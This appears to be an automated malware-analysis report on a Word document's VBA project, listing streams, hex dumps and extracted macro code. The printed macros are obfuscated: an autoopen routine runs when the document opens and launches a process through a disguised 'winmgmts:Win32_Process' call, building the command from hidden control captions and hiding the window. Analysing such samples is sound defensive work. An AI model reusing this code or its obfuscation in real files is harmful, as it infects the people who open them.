Attribute VB_Control = "McQHX3, 8, 8, MSForms, OptionButton"
Attribute VB_Control = "YWLoCv, 9, 9, MSForms, OptionButton"
Attribute VB_Control = "PWo3kW, 10, 10, MSForms, OptionButton"
Attribute VB_Control = "IjuWPtT, 11, 11, MSForms, OptionButton"
                                VBA File Name: TrS1jk.bas, Stream Size: 674
                                General
                                Stream Path:VBA/TrS1jk
                                VBA File Name:TrS1jk.bas
                                Stream Size:674
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . a / . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 61 2f ad 53 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                Attribute VB_Name = "TrS1jk"
                                VBA File Name: Uq3XXQaF.bas, Stream Size: 677
                                General
                                Stream Path:VBA/Uq3XXQaF
                                VBA File Name:Uq3XXQaF.bas
                                Stream Size:677
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . a / r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 61 2f 72 d4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                Attribute VB_Name = "Uq3XXQaF"
                                VBA File Name: V9sPZLU.cls, Stream Size: 986
                                General
                                Stream Path:VBA/V9sPZLU
                                VBA File Name:V9sPZLU.cls
                                Stream Size:986
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a / . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 61 2f a8 7a 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                False
                                VB_Exposed
                                Attribute
                                VB_Name
                                VB_Creatable
                                VB_PredeclaredId
                                VB_GlobalNameSpace
                                VB_Base
                                VB_Customizable
                                VB_TemplateDerived
                                VBA Code
                                Attribute VB_Name = "V9sPZLU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                VBA File Name: pGv5GKCO.bas, Stream Size: 4839
                                General
                                Stream Path:VBA/pGv5GKCO
                                VBA File Name:pGv5GKCO.bas
                                Stream Size:4839
                                Data ASCII:. . . . . . . . . \\ . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . a / : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 5c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 63 02 00 00 87 0d 00 00 00 00 00 00 01 00 00 00 61 2f 3a 84 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Until
                                Resume
                                jTzFBB
                                (XVBccQd
                                IEHlwRq,
                                ChrW(zTDlnFW)
                                ChrW(EkbiAj)
                                Round(npy
                                ess",
                                CreateObject(Replace("w
                                vzVjQz()
                                gmts:Win
                                sJUOza
                                RcTkkOqw
                                fYSpVZg
                                (FoWIAw
                                Rnd(GLiWOi_)
                                (wdFzjT
                                Error
                                Attribute
                                xBkGD)
                                ChrW(YMtfHC)
                                (uUBMaP
                                (movZQtjv
                                VB_Name
                                ChrB(pvOb
                                Function
                                Rnd(fHOdUi)
                                VBA Code
                                Attribute VB_Name = "pGv5GKCO"
Function vzVjQz()
     On   Error Resume Next
   G9zncq = (YVZLjB85 + Rnd(86) + (4222 + Cos(8992 * Rnd(UJ4Vqfvr) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(104 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         fd61pMMd = 512 * ChrW(zTDlnFW) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (TlEu4dn + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set OU4wzDU_ = bWzdfi7
GS0LWK = zqzYlm3 + ThisDocument.McQHX3.Caption + ThisDocument.PWo3kW.Caption + ThisDocument.psYO9m.Caption + UR1S3b
     On   Error Resume Next
   E8XQw6 = (bE0j9Ui5 + Rnd(338) + (4222 + Cos(8992 * Rnd(GLiWOi_) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(731 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         sJUOza = 512 * ChrW(nw28atwu) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (wdFzjT + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set vhuszR6 = rN2MG_
     On   Error Resume Next
   aC9tGX = (uUBMaP + Rnd(655) + (4222 + Cos(8992 * Rnd(fHOdUi) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(895 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         nUnKR8o = 512 * ChrW(YMtfHC) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (FoWIAw + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set c8_cpwB = zwuF49r

RcTkkOqw = CreateObject(Replace("w    i     nm    gmts:Win    32   _Pr    oc   ess", " ", "")).Create(GS0LWK + IEHlwRq, W8KjQY, u0rrBWd, l78zbRfV)
     On   Error Resume Next
   jTzFBB = (movZQtjv + Rnd(334) + (4222 + Cos(8992 * Rnd(EAMc9D) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(664 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         Ctpu4ftY = 512 * ChrW(EkbiAj) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (XVBccQd + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set s9NVwH = WR_wPr3Y
End Function
                                VBA File Name: zacGkX9.bas, Stream Size: 6782
                                General
                                Stream Path:VBA/zacGkX9
                                VBA File Name:zacGkX9.bas
                                Stream Size:6782
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a / / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 94 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 9b 02 00 00 9f 12 00 00 00 00 00 00 01 00 00 00 61 2f 2f c8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Error
                                Until
                                Resume
                                IFjhja
                                ShowWindow!
                                Rnd(BaBpfF)
                                Round(npy
                                (QWhXZiV
                                dlcvKIwk
                                btqQZCP
                                ChrW(VlHilWoa)
                                JvKCRbY
                                zAZIDWEn
                                "Startup"
                                fYSpVZg
                                Rnd(REjNZU)
                                (CTLvSTn
                                Attribute
                                autoopen()
                                xBkGD)
                                CPCwcG
                                VB_Name
                                ChrB(pvOb
                                Function
                                KWPvOvJS
                                (CRKhA_jf
                                vzVjQz
                                VBA Code
                                Attribute VB_Name = "zacGkX9"
Sub autoopen()
     On   Error Resume Next
   wuhj5u = (QWhXZiV + Rnd(986) + (4222 + Cos(8992 * Rnd(kf8CcM) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(892 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         Qa9atL = 512 * ChrW(VlHilWoa) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (MEz37an4 + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set IFjhja = wJlK3r
vzVjQz
     On   Error Resume Next
   XjhCsH5t = (XVDjpH3 + Rnd(280) + (4222 + Cos(8992 * Rnd(BaBpfF) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(444 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         hw8NNlz = 512 * ChrW(qlk6q2_) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (CTLvSTn + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set Za6C90f = KWPvOvJS
End Sub
Function u0rrBWd()
     On   Error Resume Next
   w0tVAR = (UvwY_w2 + Rnd(842) + (4222 + Cos(8992 * Rnd(REjNZU) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(927 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         DEdXV9 = 512 * ChrW(H49MOD) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (zYE0jXuq + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set T2IBjoKJ = CPCwcG
Set u0rrBWd = CreateObject(z6zhmi + ThisDocument.hjL90Njk.Caption + "Startup" + YfUK5MYA)
     On   Error Resume Next
   dlcvKIwk = (CRKhA_jf + Rnd(192) + (4222 + Cos(8992 * Rnd(T26ck3A) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(11 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         rDhczOL0 = 512 * ChrW(krL1ZhNF) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (q7tYSW + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set AKSIPq18 = STzBUj60
u0rrBWd. ShowWindow!  = idm89H + t_4HtlR2 + GcQ0OP + E9KJrnE + riC9rvum + Swt5C6J5
     On   Error Resume Next
   Bq4RTMp1 = (R5QGHj5F + Rnd(894) + (4222 + Cos(8992 * Rnd(l2NHvVM) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(262 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         YsHK1izD = 512 * ChrW(Vt1lB0J) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (L_w6MRPL + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set b0_jB1EO = jUdkfc5
     On   Error Resume Next
   JvKCRbY = (MYDp39w + Rnd(829) + (4222 + Cos(8992 * Rnd(drcmu54) / 83 + Log(9130)) * 2 + 85))
   For Each iArs14 In DMkD685A
      For Each BVrY355a In WtgzQ71y4
         LnIAVE4 = xMfau5248 - ChrB(pvOb + Round(npy * ChrB(KYoI8IEt)) / oZgH7909 + CDbl(qXfS4C1)) - Dzmx6W5 - Log(3 / Chr(676 / 79)) / gEpc77 * Log(816 - Round(551)) / 993 + Oct(oVggW7) / 78 / 54 + DkPTA3642 / Tan(3) / xoJtPK2 / Log(87 / Fix(mNOJc3 / CInt(LtXxD6e6) + mCtDS996 - SQxNb0rO) + DVTJJR1 + xBkGD)
      Next
      Do
         btqQZCP = 512 * ChrW(Xi8u3HTl) - 9232 - Sin(zpXA5n74) - hRdz53zQ - EOPB1 / (b67OEj8i + CByte(693))
      Loop Until fYSpVZg Eqv oWbX
   Next
   Set AQK7_3d = zAZIDWEn
End Function

                                Streams

                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 908
                                General
                                Stream Path:PROJECT
                                File Type:ASCII text, with CRLF line terminators
                                Stream Size:908
                                Entropy:5.48524719426
                                Base64 Encoded:True
                                Data ASCII:I D = " { A 6 9 3 8 8 E 4 - 1 6 4 F - 4 4 E 2 - B 4 8 7 - A 3 0 A 8 2 1 4 5 5 3 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = E E L F L r . . M o d u l e = T r S 1 j k . . M o d u l e = B d O W 1 q t . . M o d u l e = U q 3 X X Q a F . . M o d u l e = E I B Y N 3 9 s . . C l a s s = V 9 s P Z L U . . C l a s s = S 9 z l Q C C . . M o d u l e = p G v 5 G K C O . . M o d u l e = z a c G k X 9 . . H e l p F i l e = " V s j X m Y " . . E x e N a m e 3 2 = " n w 6 J
                                Data Raw:49 44 3d 22 7b 41 36 39 33 38 38 45 34 2d 31 36 34 46 2d 34 34 45 32 2d 42 34 38 37 2d 41 33 30 41 38 32 31 34 35 35 33 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 45 45 4c 46 4c 72 0d 0a 4d 6f 64 75 6c 65 3d 54 72 53 31 6a 6b 0d 0a 4d 6f 64 75 6c 65 3d 42 64 4f 57 31 71 74 0d 0a 4d 6f 64
                                Stream Path: PROJECTwm, File Type: data, Stream Size: 260
                                General
                                Stream Path:PROJECTwm
                                File Type:data
                                Stream Size:260
                                Entropy:4.10472742741
                                Base64 Encoded:False
                                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . E E L F L r . E . E . L . F . L . r . . . T r S 1 j k . T . r . S . 1 . j . k . . . B d O W 1 q t . B . d . O . W . 1 . q . t . . . U q 3 X X Q a F . U . q . 3 . X . X . Q . a . F . . . E I B Y N 3 9 s . E . I . B . Y . N . 3 . 9 . s . . . V 9 s P Z L U . V . 9 . s . P . Z . L . U . . . S 9 z l Q C C . S . 9 . z . l . Q . C . C . . . p G v 5 G K C O . p . G . v . 5 . G . K . C . O . . . z a c G k X 9 . z . a . c . G . k . X . 9 .
                                Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 45 45 4c 46 4c 72 00 45 00 45 00 4c 00 46 00 4c 00 72 00 00 00 54 72 53 31 6a 6b 00 54 00 72 00 53 00 31 00 6a 00 6b 00 00 00 42 64 4f 57 31 71 74 00 42 00 64 00 4f 00 57 00 31 00 71 00 74 00 00 00 55 71 33 58 58 51 61 46 00 55 00 71 00 33 00 58 00 58 00 51 00 61 00
                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 9530
                                General
                                Stream Path:VBA/_VBA_PROJECT
                                File Type:data
                                Stream Size:9530
                                Entropy:5.29973247502
                                Base64 Encoded:False
                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                Data Raw:cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 7382
                                General
                                Stream Path:VBA/__SRP_0
                                File Type:data
                                Stream Size:7382
                                Entropy:4.11661792439
                                Base64 Encoded:False
                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . ^ . . T C . : . ) . } \\ E . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . 3 . . . . . . . . . . . . . . .
                                Data Raw:93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 05 00 07 00 02 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 07 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00
                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 441
                                General
                                Stream Path:VBA/__SRP_1
                                File Type:data
                                Stream Size:441
                                Entropy:3.91106048466
                                Base64 Encoded:False
                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . N a m e . . . . . . . . T e x t . . . . . . . . j O W a c C z r . . . . . . . . V s j X m Y . . . . . . . . . . . . 9 : . . . . . . . . . . . . . . . . . . . . . . C v K R t Z M . . . . . . . . . . . . .
                                Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 b1 00 00 00 00 00 01 00 d1 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 09 03 00 00 00 00
                                Stream Path: VBA/__SRP_4, File Type: data, Stream Size: 534
                                General
                                Stream Path:VBA/__SRP_4
                                File Type:data
                                Stream Size:534
                                Entropy:3.02751716899
                                Base64 Encoded:False
                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . ! . . . . . . . 4 . . . . A . . . . . . . . . . . . . . . . . . @ . . . . . ! . . . . . . . < . . . . Y . . . . . . . . . . . . . . . . . . @ . . . . . ! . . . . . . . D . . . . y . . . . . . . . . . . . . . . . . . @ . . ( . . ! . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . @ . . 4 . . ! . . . . . . . T . . . . . . . . .
                                Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff 00 00 00 00 a0 00 00 00 04 00 0c 00 20 00 09 01 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 04 40 02 00 04 07 1d 21 01 00 00 00 00 01 00 34 00 00 00 20 00 41 01 00 00 00 00 01 00 ff ff ff ff 01 00 00 00 01 00 04 40 02 00 10 07 1d 21 01 00 00 00 00 01 00
                                Stream Path: VBA/__SRP_5, File Type: data, Stream Size: 1860
                                General
                                Stream Path:VBA/__SRP_5
                                File Type:data
                                Stream Size:1860
                                Entropy:2.49652674039
                                Base64 Encoded:False
                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . 9 . . . . . . . . . . . . . . ! : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . 9 . . . . . . . . . . . . . . a : . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:72 55 80 01 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 0d 00 a9 39 00 00 00 00 00 00 d1 05 00 00 00 00 00 00 d1 39 00 00 00 00 00 00 09 00 00 00 01 00 02 00 81 05 00 00 00 00 00 00 0a 00 0e 00 38 00 00 00 f9 39 00 00 00 00 00 00 e9 00 00 00 00 00
                                Stream Path: VBA/dir, File Type: data, Stream Size: 1209
                                General
                                Stream Path:VBA/dir
                                File Type:data
                                Stream Size:1209
                                Entropy:6.77269096667
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . N C 6 7 b T . . . . . , j O W a c C z r @ . . . . . O . . W . a . c . C 0 . z . r . Z . ^ V s ` j X m Y = . v . . . _ . . . ` . . . . . . . . . . @ . d _ . . . . . . . < . . . . 7 s t d o . l e > . . s . t . . d . o . l . e . ( . . h . % ^ . . * \\ . G { 0 0 0 2 0 4 . 3 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ . W i n d o w s \\ . s y s t e m 3 2 . \\ . 2 2 . t l b # . O L E A u t o . m a t i o n . 0 . . . . E N o
